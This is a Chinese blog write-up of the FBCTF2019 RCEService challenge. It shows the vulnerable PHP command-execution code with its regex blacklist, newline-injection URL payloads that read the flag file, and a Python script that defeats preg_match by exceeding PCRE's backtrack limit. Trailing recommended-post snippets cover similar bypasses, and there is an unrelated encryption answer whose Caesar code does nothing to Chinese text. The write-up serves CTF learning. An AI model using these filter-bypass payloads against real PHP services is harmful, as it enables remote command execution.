一天一道ctf 第46天(PCRE回溯次数上限)

最新推荐文章于 2024-08-18 15:39:32 发布
原创 最新推荐文章于 2024-08-18 15:39:32 发布 · 1.2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇文章讲述了如何在受限的RCEService环境中利用PCRE回溯次数限制,通过构造特殊payload来绕过命令过滤,最终获取flag的过程。涉及的知识包括PHP编程、命令执行限制、正则表达式和渗透测试技巧。

[FBCTF2019]RCEService
在这里插入图片描述
这道题只允许输入JSON格式,说白了就是键值对形式。可以{"cmd":"ls"}探测到index.php,但是拿不到源码。网上找了一下原题,很多命令都被过滤,只留了一个‘ls’。

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

preg_match只匹配第一行,%0A是换行符,putenv('PATH=/home/rceservice/jail');看到最开头这里设置了环境路径,所以直接cat是不行的,可以先看一下这个路径下有什么。这里要注意直接在URL里构造,在方框里输入会被urlencode通不过。

?cmd={%0A"cmd":"ls /home/rceservice"%0A}

在这里插入图片描述
可以看到flag就在这个文件夹下,cat要用绝对路径

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

在这里插入图片描述
也可以利用PCRE回溯次数的限制绕过,网上都贴的是p神的文章
https://www.leavesongs.com/PENETRATION/use-pcre-backtrack-limit-to-bypass-restrict.html
大致原理是preg_match的匹配存在回溯,回溯次数上限是1000000次,超过上限后函数直接返回false。

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'

res = requests.post("http://challenges.fbctf.com:8085/", data={"cmd":payload})
print(res.text)

在这里插入图片描述

scrawman
关注
[NISACTF 2022]middlerce-----正则匹配回溯绕过
qq_73767109的博客
06-26 1414
要匹配的第一个字符与字符串中的第一个进行匹配,如果匹配成功就一直匹配下去,直至匹配不成功就到第二个要匹配的字符,如果第二个匹配的字符成功了就一直匹配下去,如果不成功就吐出原匹配好的字符串最右边的一个字符进行匹配,如果还不成功就继续吐,直至匹配成功才到下一个要匹配的字符,但是我们知道,既然前一个匹配的字符成功了就肯定不符合下一个匹配的字符。2.到a这个字符从后面往前回溯匹配,先吐出一个d但匹配不上,继续吐出一个s,sd还是与a匹配不上。这个字符表示可以匹配任意的字符,那么按上面说的匹配机制,
PHP备赛CTF知识点①–清风
weixin_71913298的博客
07-10 2051
1.正则匹配的绕过 2.php短标签--- 3.MD5绕过 4.读取文件命令 5.system和exec命令的作用 6.PHP中常见伪协议
正则回溯php 绕过,PHP利用PCRE回溯次数绕过某些安全限制 | 码农网
weixin_33268205的博客
03-25 466
这次Code-Breaking Puzzles中我出了一道看似很简单的题目 pcrewaf ,将其代码简化如下:function is_php($data){return preg_match('/].*/is', $data);}if(!is_php($input)) {// fwrite($f, $input); ...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。...
php 正则 回溯,preg_match正则最大回溯以及preg_match函数的绕过
weixin_34195649的博客
03-10 1567
先提出一段代码,是i春秋上面的移到ctf题目的代码,也是需要我们绕过的代码:function areyouok($greeting){return preg_match('/Merry.*Christmas/is',$greeting);}$greeting=@$_POST['greeting'];if(!areyouok($greeting)){if(strpos($greeting,'Merr...
php pcre回溯攻击,php preg_match pcre回溯绕过
weixin_30976429的博客
03-29 440
原理需要知识:正则NFA回溯原理,php的pcre.backtrack_limit设置。正则NFA回溯原理正则表达式是一个可以被"有限状态自动机"接受的语言类。"有限状态自动机",拥有有限数量的状态,每个状态可以迁移到零个或多个状态,输入字串决定执行哪个状态的迁移。常见的正则引擎被分为DFA(确定性有限状态自动机)与NFA(非确定性有限状态自动机)他们匹配输入的过程是:DFA:从起始状态开始,一个...
利用正则回溯最大次数上限绕过preg_match
yourdawntown的博客
09-29 2237
1. 没有回溯的匹配 假设我们的正则是/ab{1,3}c/,其可视化形式是: 而当目标字符串是"abbbc"时,就没有所谓的“回溯”。其匹配过程是: 其中子表达式b{1,3}表示“b”字符连续出现1到3次。 2. 有回溯的匹配 如果目标字符串是"abbc",中间就有回溯。 图中第5步有红颜色,表示匹配不成功。此时b{1,3}已经匹配到了2个字符“b”,准备尝试第三个时,结果发现接下来的字符是“c”。那么就认为b{1,3}就已经匹配完毕。然后状态又回到之前的状态(即第6步,..
CTF WEB套路总结
2301_79879962的博客
01-28 1238
PHP代码审计套路
CTF-PHP代码审计学习笔记分享
m0_62945162的博客
06-12 1952
CTF学习笔记分享-PHP代码审计。自己总结,若有错误,请联系改正,谢谢!
CTF中的PHP特性
qq_45086218的博客
02-26 5805
文章目录正则表达式元字符模式修正符preg_match()数组绕过换行绕过intval()字符绕过科学计数法进制转换小数点绕过strpos()md5强类型比较弱类型比较md5碰撞file_put_contents()in_array()优先级 本文以ctf.show网站题目为例,总结ctf中的php特性 正则表达式 元字符 模式修正符 preg_match() 数组绕过 preg_match()只能处理字符串,当传入的subject是数组时会返回false if(preg_match("/[0-9]/
CTFSHOW大赛原题篇(web680-web695)
羽的博客
02-23 3373
CTFSHOW大赛原题篇 web680 code=phpinfo(); 先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。 r然后看下当前目录下的文件 code=var_dump(scandir(".")); 发现一个文件secret_you_never_know 直接访问就拿到flag了 。。。。。。(大无语) web681 登录的时候抓个包,比如我们传name=123会返回sql语句 select count(*) from ctfshow_users whe
php pcre回溯攻击,PHP利用PCRE回溯次数限制绕过某些安全限制
weixin_32236881的博客
03-29 345
这次 Code-Breaking Puzzles 中我出了一道看似很简单的题目pcrewaf,将其代码简化如下:].*/is',$data);}if(!is_php($input)){//fwrite($f,$input);...}大意是判断一下用户输入的内容有没有 PHP 代码,如果没有,则写入文件。这种时候,如何绕过 is_php() 函数来写入 webshel...
算法题之回溯算法
weixin_42137276的博客
07-23 1215
文章目录1、组合总和题目分析回溯剪枝去重复杂度2、全排列&第K个排列题目分析3、子集题目分析4、分割回文串题目分析 1、组合总和 题目 分析 回溯 这题需要使用回溯的方法来解题,对这个所谓回溯算法,我个人的理解是依次尝试,要配合递归,在递归前把数据放入vector,递归结束后再将加入vector的数据取出,然后进行下一次循环。 剪枝 这里还用到了剪枝,即在递归前先判断下当前的数是否还符合条件,如不符合就直接跳过,这样可以省去一些步骤。 去重 还有一个问题就要去重,比如如果candidates中包含
.exp文件_CTF中文件上传及文件包含粗略总结
weixin_39619433的博客
11-22 723
【文件上传】一、前端检查前端对文件后缀进行检查,该种通过抓包修改数据包即可解决二、文件名检查(1)大小写绕过在windows下,可以将后缀写为pHp(2)unicode当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp(3)php3457该项为apache专属关键点在/etc/apache2/mods-available/php5.6.c...
PCRE绕过正则
Aiwin的博客
06-19 1282
PCRE绕过正则和例题[NISACTF 2022]middlerce
CTF 每日一题 Day30 还原大师
ChaoYue_miku的博客
01-30 1188
题目名称:还原大师 题目类型:Crypto 题目来源:BUUCTF 题目描述:我们得到了一串神秘字符串:TASC?O3RJMV?WDJKX?ZM,问号部分是未知大写字母,为了确定这个神秘字符串,我们通过了其他途径获得了这个字串的32位MD5码。但是我们获得它的32位MD5码也是残缺不全,E903???4DAB???08???51?80??8A?,请猜出神秘字符串的原本模样,并且提交这个字串的32位MD5码作为答案。 注意:得到的 flag 请包上 flag{} 提交 ...
CTF中文件上传及文件包含总结
None安全团队
12-15 5255
【文件上传】 一、前端检查 前端对文件后缀进行检查,该种通过抓包修改数据包即可解决 二、文件名检查 (1)大小写绕过 在windows下,可以将后缀写为pHp (2)unicode 当目标存在json_decode且检查在json_decode之前,可以将php写为\u0070hp (3)php3457 该项为apache专属 关键点在/etc/apache2/mods-available/php5.6.conf这个文件,满足.+\.ph(p[3457]?|t|tml)$,都会被当.
CTF部分基础知识二之PHP(十三)】
lianafany的博客
08-18 447
PCRE
ctfhub-web进阶-shellshock(PHP学习)
qq_62078839的博客
07-09 1520
使用条件:该方法利用的bash中的一个老漏洞,即Bash Shellshock 破壳漏洞(CVE-2014-6271)。该漏洞的原因是Bash使用的环境变量是通过函数名称来调用的,导致该漏洞出现是以开头定义的环境变量在命令 ENV 中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。而其核心的原因在于在输入的过滤中没有严格限制边界,也没有做出合法化的参数判断。一般函数体内的代码不会被执行,但破壳漏洞会错误的将”{}”花括号外的命令进行执行。PHP里的某些函数能调用popen或其他能够派生
[ctf web][FBCTF2019]RCEService writeup + preg_match()绕过
ShenZ的博客
08-20 3014
[FBCTF2019]RCEService 知识点: preg_match(): 1.%0a换行绕过 2.正则(pcre)最大回溯绕过 putenv()函数 Setting an environment variable preg_match()绕过: 1.正则(pcre)最大回溯/递归限制 2.数组绕过 preg_match只能处理字符串,当传入的subject是数组时会返回false 3.%0a换行绕过 其实是正则书写不当 (1).不会匹配换行符 (2)非多行模式 putenv()函数:
ctf似乎是个加密“倒计时最后一天
最新发布
09-13
CTF竞赛中常见的加密方式有多种,以下为你介绍几种不同加密方式对“倒计时最后一天”进行加密的示例。 ### RSA加密 RSA是一种经典的非对称加密算法。参考示例中的Python代码,在实际应用时需先生成大素数 `p` 和 `q`,计算模数 `n`、欧拉函数 `s`、公钥指数 `e` 和私钥指数 `d`,再使用公钥对明文进行加密。 ```python import gmpy2 from Crypto.Util.number import bytes_to_long # 示例中的 p、q、e p = 0xEB4360DF0E0C824D57AE20700BBF6C1BA8324A94DB7B3608DDA40DE07A59082F q = 0xA5B8BA7304F15C70BA82FF60F8A4A5F156ED04896EC94A7E99B96B4E11727A8F e = 0x10001 n = p * q s = (p - 1) * (q - 1) d = gmpy2.invert(e, s) # 将明文转换为整数 plaintext = "倒计时最后一天" m = bytes_to_long(plaintext.encode()) # 加密 c = pow(m, e, n) print("加密后的密文: ", c) ``` ### Base64编码 Base64是一种常见的编码方式,可将二进制数据编码为ASCII字符。Python中可使用`base64`库进行编码。 ```python import base64 plaintext = "倒计时最后一天" encoded_bytes = base64.b64encode(plaintext.encode()) encoded_text = encoded_bytes.decode() print("Base64编码后的结果: ", encoded_text) ``` ### 凯撒密码 凯撒密码是一种简单的替换加密方法,将字母按照一定的偏移量进行替换。 ```python def caesar_encrypt(text, shift): encrypted = "" for char in text: if char.isalpha(): ascii_offset = ord('A') if char.isupper() else ord('a') encrypted += chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset) else: encrypted += char return encrypted plaintext = "倒计时最后一天" shift = 3 # 偏移量 encrypted_text = caesar_encrypt(plaintext, shift) print("凯撒密码加密后的结果: ", encrypted_text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值